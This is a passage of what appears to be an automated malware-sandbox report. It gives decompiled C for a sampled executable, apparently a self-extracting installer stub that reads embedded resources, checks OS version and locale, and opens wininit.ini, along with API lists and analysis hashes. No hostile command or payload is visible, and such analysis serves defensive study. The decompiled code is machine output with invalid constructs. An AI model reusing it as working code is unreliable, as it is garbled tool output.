                                                                                                                                                                                                                                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              						_t36 = _t46;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                              						_t44 = _t5;
                                                                                                                                                                                                                                              						_t40 = _t44;
                                                                                                                                                                                                                                              						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                              						_t47 = _t6;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t26 =  *_t40;
                                                                                                                                                                                                                                              							_t40 = _t40 + 1;
                                                                                                                                                                                                                                              						} while (_t26 != 0);
                                                                                                                                                                                                                                              						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                              						_t46 = _t51;
                                                                                                                                                                                                                                              						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                              						 *0xa8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                              						_t30 = _v32();
                                                                                                                                                                                                                                              						if(_t51 != _t51) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(_t45);
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							_t36 = 0;
                                                                                                                                                                                                                                              							FreeResource(??);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							FreeResource();
                                                                                                                                                                                                                                              							_v36 = _v36 + 1;
                                                                                                                                                                                                                                              							E00A8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                              							_t46 = 0;
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					return E00A86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8171E: _vsnprintf.MSVCRT ref: 00A81750
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A862CD
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A862D4
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A8631B
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A86345
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A86357
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                              • String ID: UPDFILE%lu
                                                                                                                                                                                                                                              • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                              • Opcode ID: 99a3d5472ed692bae306886f6790a20917b750e0be03d01894e7a946aca3eb6b
                                                                                                                                                                                                                                              • Instruction ID: c7da73c4c4d7eeb5d808152bcab974dbad40864ae3a672f58cd48316c24dc06f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99a3d5472ed692bae306886f6790a20917b750e0be03d01894e7a946aca3eb6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B421B175A00219ABEB10FFA49C499FEBB7DFB48714B14021AF942A7241DB359D068BE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A8681F(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                              				void* _v172;
                                                                                                                                                                                                                                              				int* _v176;
                                                                                                                                                                                                                                              				int _v180;
                                                                                                                                                                                                                                              				int _v184;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                                                                                                              				_t19 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                              				_t41 =  *0xa881d8; // 0xfffffffe
                                                                                                                                                                                                                                              				_t43 = 0;
                                                                                                                                                                                                                                              				_v180 = 0xc;
                                                                                                                                                                                                                                              				_v176 = 0;
                                                                                                                                                                                                                                              				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                              					 *0xa881d8 = 0;
                                                                                                                                                                                                                                              					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              						_t41 =  *0xa881d8; // 0xfffffffe
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t41 = 1;
                                                                                                                                                                                                                                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t31 = RegQueryValueExA(_v172, 0xa81140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                              							_t43 = _t31;
                                                                                                                                                                                                                                              							RegCloseKey(_v172);
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t40 =  &_v176;
                                                                                                                                                                                                                                              								if(E00A866F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                              									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                              										 *0xa881d8 = _t41;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L12;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A8686E
                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 00A868A7
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A868CC
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,?,0000000C), ref: 00A868F4
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A86902
                                                                                                                                                                                                                                                • Part of subcall function 00A866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A8691A), ref: 00A86741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 00A868C2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                              • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                              • Opcode ID: ef2ae5620f93c63b6c31007d6e314cab4a279cac06d77bfac12d51566613d898
                                                                                                                                                                                                                                              • Instruction ID: e3854b6f695006b3a25be8f4fb106d3c7413d6b90821ee82e66cb8a7f583c4b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef2ae5620f93c63b6c31007d6e314cab4a279cac06d77bfac12d51566613d898
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9319631A00318DFEB31EF51CD45BAAB7B8FB45764F0001A5E94DA6280DB309E86CF52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A83A3F(void* __eflags) {
                                                                                                                                                                                                                                              				void* _t3;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = "LICENSE";
                                                                                                                                                                                                                                              				_t1 = E00A8468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				 *0xa88d4c = _t3;
                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                              					_t19 = _t16;
                                                                                                                                                                                                                                              					if(E00A8468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA( *0xa88d4c, "<None>") == 0) {
                                                                                                                                                                                                                                              							LocalFree( *0xa88d4c);
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0xa89124 = 0;
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t9 = E00A86517(_t19, 0x7d1, 0, E00A83100, 0, 0);
                                                                                                                                                                                                                                              						LocalFree( *0xa88d4c);
                                                                                                                                                                                                                                              						if(_t9 != 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa89124 = 0x800704c7;
                                                                                                                                                                                                                                              						L2:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree( *0xa88d4c);
                                                                                                                                                                                                                                              					 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A82F64,?,00000002,00000000), ref: 00A83A5D
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A83AB3
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A83AD0
                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 00A83B13
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FindResourceA.KERNEL32(00A80000,000007D6,00000005), ref: 00A8652A
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: LoadResource.KERNEL32(00A80000,00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A86538
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: DialogBoxIndirectParamA.USER32(00A80000,00000000,00000547,00A819E0,00000000), ref: 00A86557
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FreeResource.KERNEL32(00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A86560
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00A83100,00000000,00000000), ref: 00A83AF4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$LICENSE
                                                                                                                                                                                                                                              • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                              • Opcode ID: 0dffa83777e7858dcf02d210ead1e64c65e4ff2ef7cd5721a62671752266f9cd
                                                                                                                                                                                                                                              • Instruction ID: 5692b2a1adee5da926b305a339b270e181d078859d367d1e2b75a46a9420a34a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dffa83777e7858dcf02d210ead1e64c65e4ff2ef7cd5721a62671752266f9cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2111B471600201ABEB24FBF29D0DE2779B9EBD9F40B10453EB541DA1A0EE7E88138720
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A824E0(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t7;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = __ebx;
                                                                                                                                                                                                                                              				_t7 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                              				_t25 = 0x104;
                                                                                                                                                                                                                                              				_t26 = 0;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					E00A8658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                              					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                              					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                              						_lclose(_t25);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A82506
                                                                                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A8252C
                                                                                                                                                                                                                                              • _lopen.KERNEL32 ref: 00A8253B
                                                                                                                                                                                                                                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A8254C
                                                                                                                                                                                                                                              • _lclose.KERNEL32(00000000), ref: 00A82555
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                              • String ID: wininit.ini
                                                                                                                                                                                                                                              • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                              • Opcode ID: 698b0d2985a8ffdbf3df849ed9bd2dc88de62d7e2aee2bf156d249e2a6b891df
                                                                                                                                                                                                                                              • Instruction ID: 3a6ea69bbb1e0677b7e8461fff8fd1058e05933f8ce3c14df890f710120d2ad0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 698b0d2985a8ffdbf3df849ed9bd2dc88de62d7e2aee2bf156d249e2a6b891df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF017572A0011867D720EBA5DD0DEEF7B7CEB55760F000165FA49D7190DE788E46CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00A836EE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                              				signed int _v420;
                                                                                                                                                                                                                                              				signed int _v424;
                                                                                                                                                                                                                                              				CHAR* _v428;
                                                                                                                                                                                                                                              				CHAR* _v432;
                                                                                                                                                                                                                                              				signed int _v436;
                                                                                                                                                                                                                                              				CHAR* _v440;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                                                                              				CHAR* _t77;
                                                                                                                                                                                                                                              				CHAR* _t91;
                                                                                                                                                                                                                                              				CHAR* _t94;
                                                                                                                                                                                                                                              				int _t97;
                                                                                                                                                                                                                                              				CHAR* _t98;
                                                                                                                                                                                                                                              				signed char _t99;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				signed short _t107;
                                                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                                                              				short _t113;
                                                                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                                                                              				signed char _t115;
                                                                                                                                                                                                                                              				short _t119;
                                                                                                                                                                                                                                              				CHAR* _t123;
                                                                                                                                                                                                                                              				CHAR* _t124;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				signed int _t131;
                                                                                                                                                                                                                                              				signed int _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				CHAR* _t138;
                                                                                                                                                                                                                                              				signed int _t139;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t72 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                              				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              				_t115 = __ecx;
                                                                                                                                                                                                                                              				_t135 = 0;
                                                                                                                                                                                                                                              				_v432 = __ecx;
                                                                                                                                                                                                                                              				_t138 = 0;
                                                                                                                                                                                                                                              				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                              					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                              					_t119 = 2;
                                                                                                                                                                                                                                              					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                              					__eflags = _t77;
                                                                                                                                                                                                                                              					if(_t77 == 0) {
                                                                                                                                                                                                                                              						_t119 = 0;
                                                                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                                                                              						 *0xa88184 = 1;
                                                                                                                                                                                                                                              						 *0xa88180 = 1;
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						 *0xa89a40 = _t119;
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						__eflags =  *0xa88a34 - _t138; // 0x0
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                                                              						if(_t115 == 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v428 = _t135;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                              						_t11 =  &_v420;
                                                                                                                                                                                                                                              						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                              						__eflags =  *_t11;
                                                                                                                                                                                                                                              						_v440 = _t115;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                              							_v436 = E00A82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                              							_t91 = E00A82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                              							_t123 = _v436;
                                                                                                                                                                                                                                              							_t133 = 0x54d;
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 < 0) {
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								__eflags = _v420 - 1;
                                                                                                                                                                                                                                              								if(_v420 == 1) {
                                                                                                                                                                                                                                              									_t138 = 0x54c;
                                                                                                                                                                                                                                              									L36:
                                                                                                                                                                                                                                              									__eflags = _t138;
                                                                                                                                                                                                                                              									if(_t138 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xa88a38 & 0x00000001;
											if(( *0xa88a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00A8681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00A867C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00A828E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
